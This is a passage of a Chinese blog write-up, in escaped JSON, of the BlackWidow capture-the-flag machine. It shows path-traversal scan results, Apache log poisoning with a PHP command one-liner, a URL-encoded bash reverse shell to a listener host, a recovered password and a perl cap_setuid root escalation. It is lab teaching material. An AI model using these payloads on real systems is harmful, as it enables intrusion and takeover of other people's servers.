    &quot;\/etc\/crontab&quot;                                                                                                              \n000000129:   200        21 L     102 W      881 Ch      &quot;\/etc\/apt\/sources.list&quot;                                                                                                     \n000000121:   200        227 L    1115 W     7224 Ch     &quot;\/etc\/apache2\/apache2.conf&quot;                                                                                                 \n000000138:   200        55 L     55 W       727 Ch      &quot;\/etc\/group&quot;                                                                                                                \n000000135:   200        12 L     88 W       664 Ch      &quot;\/etc\/fstab&quot;                                                                                                                \n000000206:   200        7 L      22 W       184 Ch      &quot;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/hosts&quot;                                                                             \n000000209:   200        17 L     111 W      711 Ch      &quot;\/etc\/hosts.deny&quot;                                                                                                           \n000000208:   200        10 L     57 W       411 Ch      &quot;\/etc\/hosts.allow&quot;                                                                                                          \n000000205:   200        7 L      22 W       184 Ch      &quot;\/etc\/hosts&quot;                                                                                                                \n000000269:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                                                               \n000000272:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                                                                        \n000000270:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                                                                  \n000000258:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                              \n000000268:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                                                            \n000000271:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                                                                     \n000000267:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                                                         \n000000265:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                                                   \n000000263:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                                             \n000000266:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                                                      \n000000262:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                                          \n000000264:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                                                \n000000261:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                                       \n000000257:   200        29 L     43 W       1582 Ch     &quot;\/etc\/passwd&quot;                                                                                                               \n000000259:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                                 \n000000260:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                                    \n000000254:   200        29 L     43 W       1582 Ch     &quot;\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                                                                 \n000000253:   200        29 L     43 W       1582 Ch     &quot;\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/.\/etc\/passwd&quot;                                                                                         \n000000250:   200        20 L     63 W       510 Ch      &quot;\/etc\/nsswitch.conf&quot;                                                                                                        \n000000249:   200        19 L     103 W      767 Ch      &quot;\/etc\/netconfig&quot;                                                                                                            \n000000246:   200        7 L      40 W       286 Ch      &quot;\/etc\/motd&quot;                                                                                                                 \n000000237:   200        2 L      5 W        27 Ch       &quot;\/etc\/issue&quot;                                                                                                                \n000000236:   200        355 L    1050 W     8181 Ch     &quot;\/etc\/init.d\/apache2&quot;                                                                                                       \n000000273:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                                                                           \n000000275:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/etc\/passwd&quot;                                                                                                 \n000000279:   200        29 L     43 W       1582 Ch     &quot;..\/etc\/passwd&quot;                                                                                                             \n000000283:   200        29 L     43 W       1582 Ch     &quot;etc\/passwd&quot;                                                                                                                \n000000278:   200        29 L     43 W       1582 Ch     &quot;..\/..\/etc\/passwd&quot;                                                                                                          \n000000277:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/etc\/passwd&quot;                                                                                                       \n000000274:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/etc\/passwd&quot;                                                                                              \n000000276:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/etc\/passwd&quot;                                                                                                    \n000000311:   200        29 L     43 W       1582 Ch     &quot;..\/..\/..\/..\/..\/..\/etc\/passwd&amp;=%3C%3C%3C%3C&quot;                                                                                \n000000400:   200        40 L     117 W      887 Ch      &quot;\/etc\/rpc&quot;                                                                                                                  \n000000399:   200        2 L      4 W        47 Ch       &quot;\/etc\/resolv.conf&quot;                                                                                                          \n000000422:   200        121 L    394 W      3250 Ch     &quot;\/etc\/ssh\/sshd_config&quot;                                                                                                      \n000000020:   200        29 L     43 W       1582 Ch     &quot;..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&quot;                                                       \n000000504:   200        4 L      44 W       512 Ch      &quot;\/proc\/net\/route&quot;                                                                                                           \n000000506:   200        7 L      24 W       176 Ch      &quot;\/proc\/partitions&quot;                                                                                                          \n000000505:   200        8 L      131 W      1200 Ch     &quot;\/proc\/net\/tcp&quot;                                                                                                             \n000000507:   200        0 L      1 W        27 Ch       &quot;\/proc\/self\/cmdline&quot;                                                                                                        \n000000503:   200        4 L      54 W       450 Ch      &quot;\/proc\/net\/dev&quot;                                                                                                             \n000000501:   200        32 L     192 W      2251 Ch     &quot;\/proc\/mounts&quot;                                                                                                              \n000000502:   200        4 L      27 W       316 Ch      &quot;\/proc\/net\/arp&quot;                                                                                                             \n000000500:   200        47 L     137 W      1307 Ch     &quot;\/proc\/meminfo&quot;                                                                                                             \n000000498:   200        32 L     149 W      1388 Ch     &quot;\/proc\/interrupts&quot;                                                                                                          \n000000497:   200        27 L     167 W      981 Ch      &quot;\/proc\/cpuinfo&quot;                                                                                                             \n000000499:   200        1 L      5 W        25 Ch       &quot;\/proc\/loadavg&quot;                                                                                                             \n000000509:   200        54 L     131 W      1024 Ch     &quot;\/proc\/self\/status&quot;                                                                                                         \n000000510:   200        1 L      14 W       138 Ch      &quot;\/proc\/version&quot;                                                                                                             \n000000648:   200        639 L    7668 W     123219 Ch   &quot;\/var\/log\/apache2\/access.log&quot;                                                                                               \n000000650:   200        681 L    8172 W     131149 Ch   &quot;..\/..\/..\/..\/..\/..\/..\/var\/log\/apache2\/access.log&quot;                                                                           \n000000699:   200        0 L      1 W        292583 Ch   &quot;\/var\/log\/lastlog&quot;                                                                                                          \n000000750:   200        0 L      2 W        1151 Ch     &quot;\/var\/run\/utmp&quot;                                                                                                             \n000000741:   200        11 L     66 W       53368 Ch    &quot;\/var\/log\/wtmp&quot;                                                                                                             \n000000929:   200        29 L     43 W       1582 Ch     &quot;\/\/\/\/\/\/\/..\/..\/..\/etc\/passwd&quot;                                                                                                \n\nTotal time: 3.069660\nProcessed Requests: 929\nFiltered Requests: 863\nRequests\/sec.: 302.6393<\/code><\/pre>\n<p>\u53d1\u73b0\u4e86\u4e00\u5904\u65e5\u5fd7\u5305\u542b\uff1a<code>..\/..\/..\/..\/..\/..\/..\/var\/log\/apache2\/access.log<\/code>\uff0c\u5c1d\u8bd5\u8fdb\u884c\u5229\u7528\uff1a<\/p>\n<p>\u5c1d\u8bd5\u8bbf\u95ee\u65f6\uff0cUA\u5934\u6539\u4e3a\u4e00\u53e5\u8bdd\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506171326604.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506171326604.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250617122001532\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\"># UA\n&lt;?=`$_GET[0]`?&gt;\nhttp:\/\/192.168.10.100\/company\/started.php?file=..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/var\/log\/apache2\/access.log&amp;0=id<\/code><\/pre>\n<p>\u7136\u540e\u8fdb\u884c\u5229\u7528\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506171326605.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506171326605.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250617122111592\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u7136\u540e\u628a shell \u5f39\u8fc7\u6765\u5c31\u597d\u4e86\uff0c\u4f46\u662f\u547d\u4ee4\u90fd\u6267\u884c\u4e0d\u4e86\uff0c\u5c1d\u8bd5\u8fdb\u884c\u7f16\u7801\uff1a<\/p>\n<pre><code class=\"language-bash\">http:\/\/192.168.10.100\/company\/started.php?file=..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/var\/log\/apache2\/access.log&amp;0=bash%20%2Dc%20%27bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F192%2E168%2E10%2E107%2F1234%200%3E%261%27\n# bash -c &#039;bash -i &gt;&amp; \/dev\/tcp\/192.168.10.107\/1234 0&gt;&amp;1&#039;<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506171326606.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506171326606.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250617130130751\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@blackwidow:\/var\/www\/html\/company$ sudo -l\nsudo: unable to resolve host blackwidow: Name or service not known\n\nWe trust you have received the usual lecture from the local System\nAdministrator. It usually boils down to these three things:\n\n    #1) Respect the privacy of others.\n    #2) Think before you type.\n    #3) With great power comes great responsibility.\n\n[sudo] password for www-data: \n(remote) www-data@blackwidow:\/var\/www\/html\/company$ cd \/tmp\n(remote) www-data@blackwidow:\/tmp$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/bin\/umount\n\/usr\/bin\/chfn\n\/usr\/bin\/chsh\n\/usr\/bin\/passwd\n\/usr\/bin\/sudo\n\/usr\/bin\/newgrp\n\/usr\/bin\/mount\n\/usr\/bin\/su\n\/usr\/bin\/gpasswd\n\/usr\/sbin\/mount.nfs\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/eject\/dmcrypt-get-device\n(remote) www-data@blackwidow:\/tmp$ getcap -r \/ 2&gt;\/dev\/null\n\/usr\/bin\/perl =\n\/usr\/bin\/perl5.28.1 =\n\/usr\/bin\/ping = cap_net_raw+ep\n\/usr\/lib\/squid\/pinger = cap_net_raw+ep<\/code><\/pre>\n<p>\u5c1d\u8bd5\u4e0a\u4f20<code>linpeas.sh<\/code>\uff0c\u53d1\u73b0\u4e00\u5904\u53ef\u8bfb\u7684\u5907\u4efd\u6587\u4ef6\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506171326607.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506171326607.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250617131018424\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506171326608.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506171326608.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250617131159529\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u53d1\u73b0\u5bc6\u7801\uff1a<code>?V1p3r2020!?<\/code>\u5c1d\u8bd5\u5207\u6362\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506171326609.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506171326609.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250617131355960\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u63d0\u6743root<\/h3>\n<pre><code class=\"language-bash\">viper@blackwidow:~$ ls -la\ntotal 40\ndrwxr-xr-x 4 viper viper 4096 May  2  2021 .\ndrwxr-xr-x 3 root  root  4096 Dec 12  2020 ..\ndrwx------ 4 viper viper 4096 Dec 13  2020 backup_site\n-rw------- 1 viper viper 1546 May  2  2021 .bash_history\n-rw-r--r-- 1 viper viper  220 Dec 12  2020 .bash_logout\n-rw-r--r-- 1 viper viper 3526 Dec 12  2020 .bashrc\ndrwxr-xr-x 3 viper viper 4096 Dec 13  2020 .local\n-rw------- 1 viper viper   33 Dec 12  2020 local.txt\n-rw-r--r-- 1 viper viper  807 Dec 12  2020 .profile\n-rw------- 1 viper viper   56 May  2  2021 .Xauthority\nviper@blackwidow:~$ cat local.txt \nd930fe79919376e6d08972dae222526b\nviper@blackwidow:~$ cd backup_site\nviper@blackwidow:~\/backup_site$ ls -la\ntotal 96\ndrwx------ 4 viper viper  4096 Dec 13  2020 .\ndrwxr-xr-x 4 viper viper  4096 May  2  2021 ..\ndrwxr-xr-x 6 viper viper  4096 Dec 13  2020 assets\n-rw-r--r-- 1 viper viper  1175 Dec 13  2020 changelog.txt\ndrwxr-xr-x 2 viper viper  4096 Dec 13  2020 forms\n-rw-r--r-- 1 viper viper 42179 Dec 13  2020 index.html\n-rw-r--r-- 1 viper viper  8429 Dec 13  2020 inner-page.html\n-rw-r--r-- 1 viper viper  9861 Dec 13  2020 portfolio-details.html\n-rw-r--r-- 1 viper viper   222 Dec 13  2020 Readme.txt\n-rw-r--r-- 1 viper viper   227 Dec 13  2020 started.php\nviper@blackwidow:~\/backup_site$ cd \/tmp\nviper@blackwidow:\/tmp$ getcap -r \/ 2&gt;\/dev\/null\n\/home\/viper\/backup_site\/assets\/vendor\/weapon\/arsenic = cap_setuid+ep\n\/usr\/bin\/perl =\n\/usr\/bin\/perl5.28.1 =\n\/usr\/bin\/ping = cap_net_raw+ep\n\/usr\/lib\/squid\/pinger = cap_net_raw+ep<\/code><\/pre>\n<p>\u53d1\u73b0\u65b0\u7684\u6743\u9650\uff1a<\/p>\n<pre><code class=\"language-bash\">viper@blackwidow:\/tmp$ \/home\/viper\/backup_site\/assets\/vendor\/weapon\/arsenic --help\n\nUsage: \/home\/viper\/backup_site\/assets\/vendor\/weapon\/arsenic [switches] [--] [programfile] [arguments]\n  -0[octal]         specify record separator (\\0, if no argument)\n  -a                autosplit mode with -n or -p (splits $_ into @F)\n  -C[number\/list]   enables the listed Unicode features\n  -c                check syntax only (runs BEGIN and CHECK blocks)\n  -d[:debugger]     run program under debugger\n  -D[number\/list]   set debugging flags (argument is a bit mask or alphabets)\n  -e program        one line of program (several -e&#039;s allowed, omit programfile)\n  -E program        like -e, but enables all optional features\n  -f                don&#039;t do $sitelib\/sitecustomize.pl at startup\n  -F\/pattern\/       split() pattern for -a switch (\/\/&#039;s are optional)\n  -i[extension]     edit &lt;&gt; files in place (makes backup if extension supplied)\n  -Idirectory       specify @INC\/#include directory (several -I&#039;s allowed)\n  -l[octal]         enable line ending processing, specifies line terminator\n  -[mM][-]module    execute &quot;use\/no module...&quot; before executing program\n  -n                assume &quot;while (&lt;&gt;) { ... }&quot; loop around program\n  -p                assume loop like -n but print line also, like sed\n  -s                enable rudimentary parsing for switches after programfile\n  -S                look for programfile using PATH environment variable\n  -t                enable tainting warnings\n  -T                enable tainting checks\n  -u                dump core after parsing program\n  -U                allow unsafe operations\n  -v                print version, patchlevel and license\n  -V[:variable]     print configuration summary (or a single Config.pm variable)\n  -w                enable many useful warnings\n  -W                enable all warnings\n  -x[directory]     ignore text before #!perl line (optionally cd to directory)\n  -X                disable all warnings\n\nRun &#039;perldoc perl&#039; for more help with Perl.\n\nviper@blackwidow:\/tmp$ perldoc perl\nYou need to install the perl-doc package to use this program.<\/code><\/pre>\n<p>\u53d1\u73b0\u662f\u6267\u884c<code>perl<\/code>\u7684\uff0c\u5c1d\u8bd5\u8fdb\u884c\u5229\u7528\uff1a<\/p>\n<pre><code class=\"language-bash\">viper@blackwidow:\/tmp$ \/home\/viper\/backup_site\/assets\/vendor\/weapon\/arsenic -e &quot;printf &#039;test&#039;&quot;\ntest<\/code><\/pre>\n<p>\u5c1d\u8bd5\u4e00\u4e0b\uff1a<a href=\"https:\/\/gtfobins.github.io\/gtfobins\/perl\/#capabilities\">https:\/\/gtfobins.github.io\/gtfobins\/perl\/#capabilities<\/a><\/p>\n<pre><code class=\"language-bash\">viper@blackwidow:\/tmp$ \/home\/viper\/backup_site\/assets\/vendor\/weapon\/arsenic -e &#039;use POSIX qw(setuid); POSIX::setuid(0); exec &quot;\/bin\/bash&quot;;&#039;\nroot@blackwidow:\/tmp# whoami;id\nroot\nuid=0(root) gid=1001(viper) groups=1001(viper)<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506171326610.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506171326610.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250617132507310\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">root@blackwidow:~# cat .bash_history\nbash -i &gt;&amp; \/dev\/tcp\/192.168.1.111\/1234 0&gt;&amp;1\nsudo reboot\nsu\ncd \/var\/www\/html\/\nls\nnano index.html \nsu\npython\nclear\ncurl\nclear\n\/usr\/bin\/GET\nsu\nls\nsh some.file\nls -lrt \/usr\/bin\/perl\nchmod o-x \/usr\/bin\/perl\nsu\nperl -e &#039;use POSIX qw(setuid); POSIX::setuid(0); exec &quot;\/bin\/sh&quot;;&#039;\n.\/perl -e &#039;use POSIX qw(setuid); POSIX::setuid(0); exec &quot;\/bin\/sh&quot;;&#039;\nmv perl arsenic\nls .lrt\nls -lrt\nchmod o-x arsenic \nls -lrt\nchmod 600 arsenic \nls\nls -lrt\nchmod 650 arsenic \nls -lrt\n.\/perl -e &#039;use POSIX qw(setuid); POSIX::setuid(0); exec &quot;\/bin\/sh&quot;;&#039;\n.\/arsenic -e &#039;use POSIX qw(setuid); POSIX::setuid(0); exec &quot;\/bin\/sh&quot;;&#039;\nchmod 700 arsenic \nls -lrt\n.\/arsenic -e &#039;use POSIX qw(setuid); POSIX::setuid(0); exec &quot;\/bin\/sh&quot;;&#039;\nls -lrt\ncp \/var\/www\/html\/company\/ .\/backup_site\ncp -r \/var\/www\/html\/company\/ .\/backup_site\nls -lrt\ncd backup_site\/\nls -lrt\ncd assets\nls -lrt\ncd vendor\nls lrt\nls -lrt\nmkdir weapon\nls -lrt\nmv ..\/..\/..\/arsenic weapon\/\ncd weapon\/\nls\ncd ..\nls -lrt\nsh linpe\nsh linpeas\nclear\ncd ..\nls\ncd viper\nls\nls -lrt\nchmod 600 backup_site\/\nls -lrt\ncd viper\ncd backup_site\/\nchmod 650 backup_site\/\nls -lrt\ncd backup_site\/\nchmod 700 backup_site\/\ncd backup_site\/\ncd ..\nls -lrt\ncd backup_site\/\nls -lrt\ncd assets\nls -lrt\ncd vendor\nls -lrt\ncd weapon\/\nls\n.\/arsenic -e &#039;use POSIX qw(setuid); POSIX::setuid(0); exec &quot;\/bin\/sh&quot;;&#039;\nsu\nsh linpeas\ncp \/usr\/bin\/perl .\nls\nsudo setcap cap_setuid+ep .\/perl\nsu\nsu test\nsu\nsu root\nexit\nsu root\narsenic -e &#039;use POSIX qw(setuid); POSIX::setuid(0); exec &quot;\/bin\/sh&quot;;&#039;\nls\n.\/arsenic -e &#039;use POSIX qw(setuid); POSIX::setuid(0); exec &quot;\/bin\/sh&quot;;&#039;\nsu root<\/code><\/pre>\n<p>\u5c31\u662f\u4f5c\u8005\u9884\u671f\u7684\uff01<\/p>\n<pre><code class=\"language-bash\">root@blackwidow:\/root# ls -la\ntotal 32\ndrwx------  3 root root 4096 May  2  2021 .\ndrwxr-xr-x 18 root root 4096 Dec 11  2020 ..\nlrwxrwxrwx  1 root root    9 Dec 12  2020 .bash_history -&gt; \/dev\/null\n-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc\ndrwxr-xr-x  3 root root 4096 Dec 12  2020 .local\n-rw-r--r--  1 root root  148 Aug 17  2015 .profile\n-rw-------  1 root root   14 Dec 13  2020 .python_history\n-rw-------  1 root root  926 Apr 21  2021 root.txt\n-rw-r--r--  1 root root   66 May  2  2021 .selected_editor\nroot@blackwidow:\/root# cat root.txt \n\n\u2584\u2584\u2584\u2584\u00b7 \u2584\u2584\u258c   \u2584\u2584\u2584\u00b7  \u2584\u2584\u00b7 \u2584 \u2022\u2584     \u2584\u2584\u258c \u2590 \u2584\u258c\u25aa  \u00b7\u2584\u2584\u2584\u2584        \u2584\u2584\u258c \u2590 \u2584\u258c\n\u2590\u2588 \u2580\u2588\u25aa\u2588\u2588\u2022  \u2590\u2588 \u2580\u2588 \u2590\u2588 \u258c\u25aa\u2588\u258c\u2584\u258c\u25aa    \u2588\u2588\u00b7 \u2588\u258c\u2590\u2588\u2588\u2588 \u2588\u2588\u25aa \u2588\u2588 \u25aa     \u2588\u2588\u00b7 \u2588\u258c\u2590\u2588\n\u2590\u2588\u2580\u2580\u2588\u2584\u2588\u2588\u25aa  \u2584\u2588\u2580\u2580\u2588 \u2588\u2588 \u2584\u2584\u2590\u2580\u2580\u2584\u00b7    \u2588\u2588\u25aa\u2590\u2588\u2590\u2590\u258c\u2590\u2588\u00b7\u2590\u2588\u00b7 \u2590\u2588\u258c \u2584\u2588\u2580\u2584 \u2588\u2588\u25aa\u2590\u2588\u2590\u2590\u258c\n\u2588\u2588\u2584\u25aa\u2590\u2588\u2590\u2588\u258c\u2590\u258c\u2590\u2588 \u25aa\u2590\u258c\u2590\u2588\u2588\u2588\u258c\u2590\u2588.\u2588\u258c    \u2590\u2588\u258c\u2588\u2588\u2590\u2588\u258c\u2590\u2588\u258c\u2588\u2588. \u2588\u2588 \u2590\u2588\u258c.\u2590\u258c\u2590\u2588\u258c\u2588\u2588\u2590\u2588\u258c\n\u00b7\u2580\u2580\u2580\u2580 .\u2580\u2580\u2580  \u2580  \u2580 \u00b7\u2580\u2580\u2580 \u00b7\u2580  \u2580     \u2580\u2580\u2580\u2580 \u2580\u25aa\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2022  \u2580\u2588\u2584\u2580\u25aa \u2580\u2580\u2580\u2580 \u2580\u25aa\n\nCongrats!\n\nYou&#039;ve rooted Black Widow!\n\n0xJin - mindsflee\nFollow on Instagram: 0xjiin\nFollow on Twitter: 0xJin , @mindsflee\n\n0780eb289a44ba17ea499ffa6322b335\n\nroot@blackwidow:\/root# cat .python_history\nexti()\nexit()<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>BlackWidow \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/BlackWindow 